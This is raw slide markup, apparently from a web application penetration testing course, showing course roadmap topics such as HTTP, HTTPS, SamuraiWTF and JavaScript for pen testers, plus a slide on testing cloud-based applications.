                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise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03835" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Cloud-based Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1630680"/>
            <a:ext cx="5486400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Cloud computing has exploded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>On demand resources are becoming more common</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Testing of these applications are no different</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>They tend to focus on functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Liability or restrictions stop many security testing processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Are we allowed too?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Vendors hesitate to allow testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Or so it's assumed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1536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33160" y="1706880"/>
            <a:ext cx="2508250" cy="396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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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 Cont.</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Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6705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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
